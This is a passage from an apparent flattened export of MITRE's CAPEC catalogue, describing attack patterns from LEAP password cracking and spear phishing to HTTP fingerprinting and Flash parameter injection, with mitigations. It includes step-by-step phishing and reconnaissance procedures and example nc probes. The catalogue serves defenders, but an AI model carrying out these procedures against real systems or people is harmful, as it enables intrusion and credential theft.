session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server. Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques. CVE-2003-1096 Low A variety of password cracking tools and dictionaries are available to launch this type of an attack. A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack. Many invalid login attempts are coming from the same machine (same IP address) or for the same log in name. The login attempts use passwords that are dictionary words. Employ IP spoofing to make it seem like login attempts are coming from different machines. Create a strong password policy and ensure that your system enforces this policy. Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-02. Confidentiality Access_Control Authorization Gain privileges / assume identity 521 Targeted 262 Targeted 263 Targeted 693 Targeted 1000 Attack Pattern ChildOf 49 Penetration High Medium Low All All All All Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Solutions Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2014-02-06 Updated Examples-Instances Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support <script< tags that allow scripting languages to be embedded in the page and then interpreted by the receiving web browser. If the content provider is malicious, these scripts can compromise the client application. Some applications may even execute the scripts under their own identity (rather than the identity of the user providing the script) which can allow attackers to perform activities that would otherwise be denied to them. The target application must include the use of APIs that execute scripts. The target application must allow the attacker to provide some or all of the arguments to one of these script interpretation methods and must fail to adequately filter these arguments for dangerous or unwanted script commands. Medium The attacker must have the ability to write a script and submit it to the appropriate API method in the target application. 1000 Attack Pattern ChildOf 113 An attacker exploits characteristics of the infrastructure of a network entity in order to perpetrate attacks or information gathering on network objects or effect a change in the ordinary information flow between network objects. Most often, this involves manipulation of the routing of network messages so, instead of arriving at their proper destination, they are directed towards an entity of the attackers' choosing, usually a server controlled by the attacker. The victim is often unaware that their messages are not being processed correctly. For example, a targeted client may believe they are connecting to their own bank but, in fact, be connecting to a Pharming site controlled by the attacker which then collects the user's login information in order to hijack the actual bank account. The targeted client must access the site via infrastructure that the attacker has co-opted and must fail to adequately verify that the communication channel is operating correctly (e.g. by verifying that they are, in fact, connected to the site they intended.) High The attacker must be able to corrupt the infrastructure used by the client. For some variants of this attack, the attacker must be able to stand up their own services that mimic the services the targeted client intends to use. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker exploits a weakness in the server's trust of client-side processing by modifying data on the client-side, such as price information, and then submitting this data to the server to effect a change in the state of an ordinary transaction. eShoplifting is a data manipulation attack against an on-line merchant during a purchasing transaction. The manipulation of price, discount or quantity fields in the transaction message allows the attacker to acquire items at a lower cost than the merchant intended. The attacker performs a normal purchasing transaction but edits hidden fields within the HTML form response that store price or other information to give themselves a better deal. The merchant then uses the modified pricing information in calculating the cost of the selected items. The targeted merchant site must use a shopping cart that does not obfuscate the transaction data and does not validate pricing with back end processing. High The attacker must be able to craft HTTP responses to the target's shopping site. 602 Targeted 1000 Category ChildOf 212 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Prerequisites, Related_Attack_Patterns An attacker targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack. Obtain useful contextual detailed information about the targeted user or organization An attacker collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding. Conduct web searching research of target. 405 env-Web Identify trusted associates, colleagues and friends of target. 405 env-All Utilize social engineering attack patterns such as Pretexting. 407 env-All Collect social information via dumpster diving. 406 env-All Collect social information via traditional sources. 408 env-All Collect social information via Non-traditional sources. 409 env-All Optional: Obtain domain name and certificate to spoof legitimate site This optional step can be used to help the attacker impersonate the legitimate site more convincingly. The attacker can use homograph attacks to convince users that they are using the legitimate website. Note that this step is not required for phishing attacks, and many phishing attacks simply supply URLs containing an IP address and no SSL certificate. Optionally obtain a domain name that visually looks similar to the legitimate site's domain name. An example is www.paypaI.com vs. www.paypal.com (the first one contains a capital i, instead of a lower case L). env-Web Optionally obtain a legitimate SSL certificate for the new domain name. env-Web Websites can acquire many domain names that are similar to their own. For example, the company example.com should be sure to register example.net, .org, .biz, .info and so on. Likewise they should register exarnple.com, examp1e.com, exampIe.com (and possibly .net, .org variations). Although this does not preclude the possibility of phishing, it makes the attackers' job harder because all the easily believable names are taken. Optional: Explore legitimate website and create duplicate An attacker creates a website (optionally at a URL that looks similar to the original URL) that closely resembles the website that he or she is trying to impersonate. That website will typically have a login form for the victim to put in their authentication credentials. There can be different variations on a theme here. Use spidering software to get copy of web pages on legitimate site. env-Web Manually save copies of required web pages from legitimate site. env-Web Create new web pages that have the legitimate site's look at feel, but contain completely new content. env-Web Optional: Build variants of the website with very specific user information e.g., living area, etc. Once the attacker has his website which duplicates a legitimate website, he needs to build very custom user related information in it. For example, he could create multiple variants of the website which would target different living area users by providing information such as local news, local weather, etc. so that the user believes this is a new feature from the website. Integrate localized information in the web pages created to duplicate the original website. Those localized information could be dynamically generated based on unique key or IP address of the future victim. env-Web Convince user to enter sensitive information on attacker's site. An attacker sends a message (typically an e-mail) to the victim that has some sort of a call to action to get the user to click on the link included in the e-mail (which takes the victim to attacker's website) and log in. The key is to get the victim to believe that the message is coming from a legitimate entity trusted by the victim or with which the victim or does business and that the website pointed to by the URL in the e-mail is the legitimate website. A call to action will usually need to sound legitimate and urgent enough to prompt action from the user. Send the user a message from a spoofed legitimate-looking e-mail address that asks the user to click on the included link. env-Web Place phishing link in post to online forum. env-Web Legitimate user clicks on link supplied by attacker and enters the requested information. Legitimate user realizes that the e-mail is not legitimate, or that the attackers' website is not legitimate, and therefore, does not enter the information requested by the attacker. Monitor server logs for referrers. Phishing websites frequently include links to "terms and conditions" "privacy" and other standard links on the legitimate site. Users' web browsers will generally reveal the phishing site in the Referrer header. Since the URL may not visually stand out compared to the legitimate URL, some programmatic consolidation of referrers from log files may be required to ensure that example.com stands out from examp1e.com, for example. Use stolen credentials to log into legitimate site Once the attacker captures some sensitive information through phishing (login credentials, credit card information, etc.) the attacker can leverage this information. For instance, the attacker can use the victim's login credentials to log into their bank account and transfer money to an account of their choice. Log in to the legitimate site using another user's supplied credentials. env-Web Use a human verifiable shared secret between legitimate site and end user such as the one provided by PassMark Security (now part of RSA Security). This prevents the attacker from using stolen credentials. Note that this does not protect against some man-in-the-middle attacks where an attacker establishes a session with the legitimate site and convinces an end user to establish a session with him. The attacker then records and forwards information flowing between the end user and the trusted site. This security control is currently used by many online banking websites including Bank of America's website. Use an out-of-band user authentication mechanism before allowing particular computers to "register" to use the legitimate site with particular login credentials. This also prevents the attacker from using stolen credentials. An example may be sending a SMS message to the user's cell phone (cell phone number previously acquired by site) with an "activation code" every time the user attempts to log into the site from a new computer. This solution also does not protect against the man-in-the-middle attack described in the previous security control. This mechanism is currently used by several online banking websites including JP Morgan Chase's website. None. Any user can be targeted by a Spear Phishing attack. High High Social Engineering Spoofing John gets an official looking e-mail from his bank stating that his or her account has been temporarily locked due to suspected unauthorized activity that happened in the area different that where he lives (details might be provided by the spear phishers) and that John needs to click on the link included in the e-mail to log in to his bank account in order to unlock it. The link in the e-mail looks very similar to that of his bank and once the link is clicked, the log in page is the exact replica. John supplies his login credentials after which he is notified that his account has now been unlocked and that everything is fine. An attacker has just collected John's online banking information which can now be used by him or her to log into John's bank account and transfer John's money to a bank account of the attackers' choice. Medium Some web development tools to put up a fake website. Do not follow any links that you receive within your e-mails and certainly do not input any login credentials on the page that they take you too. Instead, call your Bank, PayPal, eBay, etc., and inquire about the problem. A safe practice would also be to type the URL of your bank in the browser directly and only then log in. Also, never reply to any e-mails that ask you to provide sensitive information of any kind. Confidentiality Read application data Information Leakage Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Privilege Escalation Integrity Modify application data Data Modification 1000 Attack Pattern ChildOf 98 1000 Attack Pattern CanFollow 405 1000 Attack Pattern CanFollow 406 1000 Attack Pattern CanFollow 407 http://capec.mitre.org/data/definitions/176.html 1000 Attack Pattern CanFollow 408 1000 Attack Pattern CanFollow 409 Exploitation High High Low Client-Server n-Tier All All All Romain Gaucher Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Pre-review - 0.1 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations An attacker targets mobile phone users with a phishing attack for the purpose of soliciting account passwords or sensitive information from the user. Mobile Phishing is a variation on the Phishing social engineering technique where the attack is initiated via mobile texting rather than email. The user is enticed to provide information or go to a compromised web site via a text message. Apart from the manner in which the attack is initiated, the attack proceeds as a standard Phishing attack. Attacker needs mobile phone numbers to initiate the connection. The attacker must guess an area of interest for the mobile user to entice them to follow the link provided in the text message. The attacker must have a replicated web site as in a normal Phishing attack. High Either mobile phone or access to a web resource that allows text messages to be sent to mobile phones. Resources needed for regular Phishing attack. 1000 Attack Pattern ChildOf 98 An attacker modifies file contents or attributes (such as extensions or names) of files in a manner to cause incorrect processing by an application. Attackers use this class of attacks to cause applications to enter unstable states, overwrite or expose sensitive information, and even execute arbitrary code with the application's privileges. This class of attacks differs from attacks on configuration information (even if file-based) in that file manipulation causes the file processing to result in non-standard behaviors, such as buffer overflows or use of the incorrect interpreter. Configuration attacks rely on the application interpreting files correctly in order to insert harmful configuration information. Likewise, resource location attacks rely on controlling an application's ability to locate files, whereas File Manipulation attacks do not require the application to look in a non-default location, although the two classes of attacks are often combined. The target must use the affected file without verifying its integrity. Medium No special resources are required for most variants of this attack. In some cases, tools are needed to better control the response of the targeted application to the modified file. 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices. The targeted application must have a reset function that returns the configuration of the application to an earlier state. The reset functionality must be inadequately protected against use. Medium No special resources are required for execution of this attack. In some cases, the attacker may need special client applications or a given level of access to the application in order to execute the reset functionality. 1000 Attack Pattern ChildOf 171 An attacker examines an available client application for the presence of sensitive information. This information may be stored in configuration files, embedded within the application itself, or stored in other ways. Sensitive information may include long-term keys, passwords, credit card or financial information, and other private material that the client uses in its interactions with the server. While servers are (hopefully) protected with professional security administrators, most users may be less skilled at protecting their clients. As a result, the user client may represent a weak link that an attacker can exploit. If an attacker can gain access to a client installation, they may be able to detect and lift sensitive information that could be used directly (such as financial information), or allow the attacker to subvert future communication between the client and the server. In some cases, it may not even be necessary to gain access to another user's installation - if all instances of the client software are embedded with the same sensitive information (for example, long term keys for communication with the server) then the attacker must simply find a way to gain their own copy of the client in order to perform this attack. The client application installation must retain sensitive information locally. Moreover, it must fail to adequately protect this information against viewing by an attacker. Encrypting the information would thwart this type of attack, but only if the key used to encrypt this information was not itself locally accessible. Medium Depending on the details of the attack, the attacker may require access to a targeted user's installation of the client. Alternatively, the attacker may need to acquire any instance of the client. 642 Targeted 311 Targeted 1000 Attack Pattern ChildOf 22 1000 Attack Pattern ChildOf 281 An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple "files" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams. The target must be running the Microsoft NTFS file system. Medium No special tools or resources are required. The attacker must have command line or programmatic access to the target's files system with write/read permissions. Design: Use FAT file systems which do not support Alternate Data Streams. Implementation: Use Vista dir with the -R switch or utility to find Alternate Data Streams and take appropriate action with those discovered. Implementation: Use products that are Alternate Data Stream aware for virus scanning and system security operations. 212 Secondary 69 Targeted 1000 Attack Pattern ChildOf 272 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks. Request Footprinting The attacker examines the website information and source code of the website and uses automated tools to get as much information as possible about the system and organization. Open Source Footprinting: Examine the website about the organization and skim through the webpage's HTML source to look for comments. env-Web Network Enumeration: Perform various queries (Registrar Query, Organizational Query, Domain Query, Network Query, POC Query) on the many whois databases found on the internet to identify domain names and associated networks. env-Web DNS Interrogation: Once basic information is gathered the attack could begin to query DNS. env-Web Other Techniques: Use ping sweep, TCP scan, UDP scan, OS Identification various techniques to gain more information about the system and network. env-Web The response contains sensitive information such as ports open, network block, server version etc. env-Web The response does not contain sensitive information about the system and network. env-Local A list of sensitive information about the system and network. There is no information available about the system and network. The server may detect a large amount of port scan request, illegal ICMP and TCP packets. None. Any system or network that can be detected can be footprinted. However, some configuration choices may limit the useful information that can be collected during a footprinting attack. Very Low High Protocol Manipulation Injection Analysis Social Engineering In this example let us look at the website http://www.example.com to get much information we can about Alice. From the website, we find that Alice also runs foobar.org. We type in www example.com into the prompt of the Name Lookup window in a tool, and our result is this IP address: 192.173.28.130 We type the domain into the Name Lookup prompt and we are given the same IP. We can safely say that example and foobar.org are hosted on the same box. But if we were to do a reverse name lookup on the IP, which domain will come up? www.example.com or foobar.org? Neither, the result is nijasvspirates.org. So nijasvspirates.org is the name of the box hosting 31337squirrel.org and foobar.org. So now that we have the IP, let's check to see if nijasvspirates is awake. We type the IP into the prompt in the Ping window. We'll set the interval between packets to 1 millisecond. We'll set the number of seconds to wait until a ping times out to 5. We'll set the ping size to 500 bytes and we'll send ten pings. Ten packets sent and ten packets received. nijasvspirates.org returned a message to my computer within an average of 0.35 seconds for every packet sent. nijasvspirates is alive. We open the Whois window and type nijasvspirates.org into the Query prompt, and whois.networksolutions.com into the Server prompt. This means we'll be asking Network Solutions to tell us everything they know about nijasvspirates.org. The result is this laundry list of info: Registrant: FooBar (nijasvspirates -DOM) p.o.box 11111 SLC, UT 84151 US Domain Name: nijasvspirates.ORG Administrative Contact, Billing Contact: Smith, John jsmith@anonymous.net FooBar p.o.box 11111 SLC, UT 84151 555-555-6103 Technical Contact: Johnson, Ken kj@fierymonkey.org fierymonkey p.o.box 11111 SLC, UT 84151 555-555-3849 Record last updated on 17-Aug-2001. Record expires on 11-Aug-2002. Record created on 11-Aug-2000. Database last updated on 12-Dec-2001 04:06:00 EST. Domain servers in listed order: NS1. fierymonkey.ORG 192.173.28.130 NS2. fierymonkey.ORG 64.192.168.80 A corner stone of footprinting is Port Scanning. Let's port scan nijasvspirates.org and see what kind of services are running on that box. We type in the nijasvspirates IP into the Host prompt of the Port Scan window. We'll start searching from port number 1, and we'll stop at the default Sub7 port, 27374. Our results are: 21 TCP ftp 22 TCP ssh SSH-1.99-OpenSSH_2.30 25 TCP smtp 53 TCP domain 80 TCP www 110 TCP pop3 111 TCP sunrpc 113 TCP ident Just by this we know that Alice is running a website and email, using POP3, SUNRPC (SUN Remote Procedure Call), and ident. Low Attacker knows how to send HTTP request, run the scan tool. The attacker requires a variety of tools to collect information about the target. These include port and network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected. Configuration: Keep patches up to date by installing weekly or daily if possible. Configuration: Shut down unnecessary services/ports. Policy: Change default passwords by choosing strong passwords. Implementation: Curtail unexpected input. Design: Encrypt and password-protect sensitive data. Policy: Place offline any information that has the potential to identify and compromise your organization's security such as access to business plans, formulas, and proprietary documents. Confidentiality "Varies by context" Information Leakage 497 Targeted 200 Targeted 202 Targeted 538 Targeted 311 Targeted 312 Targeted 319 Targeted 276 Targeted 1000 Attack Pattern ChildOf 281 http://capec.mitre.org/data/definitions/281.html 1000 Category PeerOf 224 Exploitation Medium Low Low Client-Server n-Tier SOA All All All Manic Velocity Footprinting And The Basics Of Hacking Web Textfiles http://web.textfiles.com/hacking/footprinting.txt Eddie Sutton Footprint: What Is And How Do You Erase Them http://www.infosecwriters.com/text_resources/pdf/Footprinting.pdf Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content Min Xu Cigital, Inc. Pre-review - 0.1 Romain Gaucher Cigital, Inc. Performed a review of content and added additional content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface. System's configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment. Very High High Modification of Resources API Abuse Consider a directory on a web server with the following permissions drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot This could allow an attacker to both execute and upload and execute programs' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit. Low To identify and execute against an over-privileged system interface Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP. Design: Enforce principle of least privilege Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands. Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables. Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify application data Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Payload delivered through standard communication protocols. Command(s) executed directly on host Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 732 Targeted 285 Targeted 272 Targeted 59 Targeted 282 Targeted 275 Targeted 264 Targeted 270 Targeted 693 Targeted 1000 Attack Pattern ChildOf 1 1000 Category ChildOf 233 1000 Attack Pattern ChildOf 165 Penetration High Medium Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.17.1][REF-2] Cigital, Inc 2007-01-01 [R.17.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Description and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Resources_Required, Solutions_and_Mitigations An attacker sends a series of probes to a web server or application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web server/application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks. Request fingerprinting Use automated tools or send web server specific commands to web server and wait for server's response. Use automated tools or send web server specific commands to web server and then receive server's response. env-Web HTTP response headers contain fingerprinting sensitive fields indicating server's vendors and versions. env-Web HTTP response headers do not contain fingerprinting sensitive fields indicating server's vendors and versions. env-Web A list of fingerprinting sensitive information from HTTP response headers. There is no HTTP response header information available. Web application firewall may detect a large amount of HTTP requests from the same host. Increase the accuracy of server fingerprinting of Web servers Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior. Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities. env-Web Send bad requests or requests of nonexistent pages to the server. env-Web Attacker takes existing automated tools to recognize the type and the version of the web server in use. env-Web Find different inner reordering of headers in HTTP response due to different versions of the server. env-Web Every server answers to a Bad request in a different way due to different versions of the server. env-Web Find signatures of web servers in database of automated tools. env-Web HTTP response headers all look like identical. env-Web The attacker successfully identifies server's vendors and versions. Alert on standard fingerprinting probes. Use the same vulnerability catalogs that hackers use. Alert on bad request. Obfuscate server fields of HTTP response. Hide inner ordering of HTTP response header. Customizing HTTP error codes such as 404 or 500. Identify Web Application Software After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server. Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server. env-Web Examine the HTTP Response Headers. This may leak information about software signatures env-Web Examine Cookies that may contain server's software information. env-Web Check error pages. env-Web File name extensions can be found in the URL. env-Web HTTP Response headers show software version. env-Web Cookies leak information for server's version. env-Web From error messages, the stack trace of errors and exceptions may also explicitly tell application software information. env-Web File name extensions can be found in the URL. HTTP Response headers show software version. Cookies leak information for server's version. From error messages, the stack trace of errors and exceptions may also explicitly tell application software information. The attacker successfully identifies web application software vendors and versions. Alert on standard fingerprinting probes. Use the same vulnerability catalogs that hackers use. Alert on bad request. Hide URL file extension. Hide HTTP response header software information filed. Hide cookie's software information filed Appropriately deal with error messages. Identify Backend Database Version Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error. Use tools to send bogus SQL query to the server and check error pages. env-Web Get error messages from SQL response. env-Web No error messages. env-Web The attacker successfully identifies database type from error messages. The attacker fails to identify database type from error messages. Alert on standard fingerprinting probes. Use the same vulnerability catalogs that hackers use. Alert on bad request. Obfuscate database type in Database API's error message. Any web server/application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack. Low High Analysis An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses. Response from Apache 1.3.23 $ nc apache.server.com 80 GET / HTTP/3.0 HTTP/1.1 400 Bad Request Date: Sun, 15 Jun 2003 17:12: 37 GMT Server: Apache/1.3.23 Connection: close Transfer: chunked Content-Type: text/HTML; charset=iso-8859-1 Response from IIS 5.0 $ nc iis.server.com 80 GET / HTTP/3.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Content-Location: http://iis.example.com/Default.htm Date: Fri, 01 Jan 1999 20:14: 02 GMT Content-Type: text/HTML Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT ETag: W/e0d362a4c335be1: ae1 Content-Length: 133 [R.170.2] Low Attacker knows how to send HTTP request, SQL query to a web application. While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected. Implementation: Obfuscate server fields of HTTP response. Implementation: Hide inner ordering of HTTP response header. Implementation: Customizing HTTP error codes such as 404 or 500. Implementation: Hide URL file extension. Implementation: Hide HTTP response header software information filed. Implementation: Hide cookie's software information filed. Implementation: Appropriately deal with error messages. Implementation: Obfuscate database type in Database API's error message. Confidentiality "Varies by context" Information Leakage Any HTTP Request transport variables (HTTP Headers, etc.) HTTP request and response Leakage server's information. 1000 Category ChildOf 224 Reconnaissance Medium Low Low Web Client-Server n-Tier All All All Saumil Shah An Introduction to HTTP fingerprinting http://net-square.com/httprint/httprint_paper.html OWASP Testing Guide Testing for Web Application Fingerprint (OWASP-IG-004) v4 [DRAFT] The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_Web_Application_Fingerprint_%28OWASP-IG-004%29 HTTP 1.1 Specification (RFC 2616) IETF RFC http://www.ietf.org/rfc/rfc2616.txt WASC Threat Classification 2.0 WASC-45 - Fingerprinting The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Fingerprinting Wendy Jin Cigital, Inc. Pre-review - 0.1 MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Wendy Jin Cigital, Inc. Pre-review - 0.1 CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations An attacker manipulates variables used by an application to perform a variety of possible attacks. This can either be performed through the manipulation of function call parameters or by manipulating external variables, such as environment variables, that are used by an application. Changing variable values is usually undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a variable value beyond an application's ability to store it). The targeted application must rely on external variables (e.g. environment variables) or user-controlled variables (e.g. call parameters) in such a way that malicious manipulation of them can subvert functionality. Medium The attacker must be able to manipulate the targeted variable. For some variables, such as URL-encoded parameters in a web call, this is very simple. For others, such as a system's environment variables, this can require additional resources or capabilities. Design: Range, size and value and consistency verification for any arguments supplied to application from external sources and devise appropriate error response. Design: Ensure that variables that should not be manipulated by a user are not accessible to them. 471 Targeted 20 Targeted 1000 Category ChildOf 262 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Attackers may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface. The victim must be convinced into performing the decoy action. Very High The attacker must have enough control over a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the attacker be able to host (or control) content that the user visits. 1000 Category ChildOf 156 CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns An attacker injects values to global parameters into a Flash movie embedded in an HTML document. These injected parameters are controlled through arguments in the URL used to access the embedding HTML document. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page's document model, including associated cookies) make this attack more flexible. The injected parameters can allow the attacker to control other objects within the Flash movie as well as full control over the parent document's DOM model. Spider Using a browser or an automated tool, an attacker records all instances of HTML documents that have embedded Flash movies. If there is an embedded Flash movie, he lists how to pass global parameters to the Flash movie from the embedding object. Use an automated tool to record all instances of URLs which have embedded Flash movies and list the parameters passing to the Flash movie. env-Web Use a browser to manually explore the website to see whether the HTML document has embedded Flash movies or not and list the parameters passing to the Flash movie. env-Web The HTML document has embedded Flash movies. env-Web The HTML file doesn't appear to contain Flash movies, but Ajax request seems possible and could insert Flash movies. env-Web A list of URLs which has embedded Flash movies and the list of parameters passing to the Flash movies. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Determine the application susceptibility to Flash parameter injection Determine the application susceptibility to Flash parameter injection. For each URL identified in the Explore phase, the attack attempts to use various techniques such as DOM based, reflected, flashvars, persistent attacks depending on the type of parameter passed to the embedded Flash movie. When the JavaScript 'document.location' variable is used as part of parameter, inject '#' and payload into the parameter in the URL. env-Web When the name of the Flash movie is exposed as a form or a URL parameter, the attacker injects '?' and payload after the movie name in the URL to overrides some global value. env-Web When the arguments passed in the 'flashvars' attributes, the attacker injects '&' and payload in the URL. env-Web If some of the attributes of the <object> tag are received as parameters, the 'flashvars' attribute is injected into the <object> tag without the creator of the Web page ever intending to allow arguments to be passed into the Flash file. env-Web If shared objects are used to save data that is entered by the user persistent Flash parameter injection may occur, with malicious code being injected into the Flash file and executed, every time the Flash movie is loaded. env-Web At least one URL is found susceptible to flash parameter injection. No URL is found susceptible to injection. User input must be sanitized 